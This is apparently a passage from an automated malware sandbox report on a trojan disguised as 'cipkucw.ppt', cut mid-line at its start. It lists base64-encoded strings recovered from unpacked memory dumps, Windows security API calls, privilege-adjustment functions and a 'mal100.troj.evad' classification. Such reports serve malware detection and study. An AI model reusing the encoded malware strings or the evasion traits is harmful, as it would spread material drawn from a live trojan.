wuoQUmSDorQE6wUbJ+Nkh+dqmeXaZXKQx0J6EUXCj4QfOg5zXnYQcWogT4W/r2X4CJOKaA4FTEBbskBNP5b5MSgMr2KXCEoMU8GH0Ci4HSOPE+Do4Tqy/KB50JyroBib9xQjZme0w9vp0rYxIShH9MCVcRFBYDctoNpP9DQaQ2dge+yXi5sVVcf1or2Z9TzH52Xenx0bVTEySSaaa+LNjynqn3Iuf0K170/LU+u1meBmYFdALfkil0UKo+siN/DMJpXprYRbrE9KsoU3ojt1RMPR+BVCWwrp6jRU3gRKdXHTiqMpi/fFqvBL+PBpHMCn5VJZJVezv2+KsA15BhVG7i6gNAeVU4QREmZw2Kf3WkHp0D94IcyAJeMREMubYVc/UlhjBXGaSz30WvdKrnGZm/8VRU7SpMM6cybjYuQBk0jDWpxYMgBcWSWjVozg10mYTPyVvcedvV8XYxhmUg1EdaNm44xadYTE5rskTuCyQCbtLxO5N7cbj7HKzCZK8E3AQ54bwVJkFp6Cf5bxhY0Ryka3vUFvCr43v4f0pyr63S7cC5+9e8T3/axZ5ZcxMYiY4/yN/U+MRGXNW/mmQiIIaJFwfwhPjYG8f+8B0q5AZLcEtrZa/NkyNs4Suk0ggoHSIi1kmtSDsFcRQZ+MIx0uVIYaDDj2s1o/b7yacwVBcLFUNMDy/KR3Q+OrSjH8XuTk38S8cXHaKsqcjdYYIc+CKtup2Do+bvxRhz7pXkWO0C+YBZEFX9qKAo1XzKhDjU70rY0hwXKYuzbJKIMovVM0At/81wadsoAqzTs9sOZCyDx10NVo6lLEQ5WsvvpFD/2gMkIKyQo9mDmXRs6Z6sEWwEgOdNBQtgMQGTLjePe/4Hx9SbnTJe8QJETj+ORvWkEfWwB8rVjIZyli2jafIGorww1GVCI8gcp0vn0w8HhonGZewQksJEuevOaoTp4LvPZXRjpJSbIZ5cYHLltz/Tt7zjjKp2TMTT7X39qklInJ7OK9OkDLvbun3TaGPGklEiqTJMyuehpVqaLq+e43KPTIZH7E6tICrWcuebQh+ib8XWFox4H/tD3PIWU/8cAA8mJ8XGelXrsYonSITRG5Vd4G1j64R8AnaoOV1ipcc/WQZW0JksPZJoM65/I3fNyc4Uwwb147UlSE=', 'jQ/BmvL3ZCQLV4bB+QYYm7GW6hANmnzIA4Y6ukYIrlJ4Js6dp/GISJc138goE8jgchUQQqzT7ySejVuWvihZ4SXoyFtz6YLkDbG7/gazS1TaX+OQLiDzWtuOtABEMFBU7E4DnGu7VvRnMr/YevA6ugNI4cAqdUyk76fhx1rz7Y9aGWzaiELaJm+llyU8HDDqurzLQJ7NXjM4+b81VIiZ4PMB0yxe3KQJlD83597oCSMkMASxP1GMi0V6tHFq0gdCMlfLc0fX5oyyw2o8H+CxdlXQqI7lmi40T8nWXevid+GVxJIe4nQhT9x
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, cSqZGleJeFOouKW.csBase64 encoded string: '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
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, cSqZGleJeFOouKW.csBase64 encoded string: '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
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, cSqZGleJeFOouKW.csBase64 encoded string: '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
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, cSqZGleJeFOouKW.csBase64 encoded string: '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
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, RsIiOhNZgBqD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@29/61@0/1
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0027932C GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_0027932C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075194F AdjustTokenPrivileges,CloseHandle,6_2_0075194F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00751F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00751F53
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102194F AdjustTokenPrivileges,CloseHandle,15_2_0102194F
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01021F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_01021F53
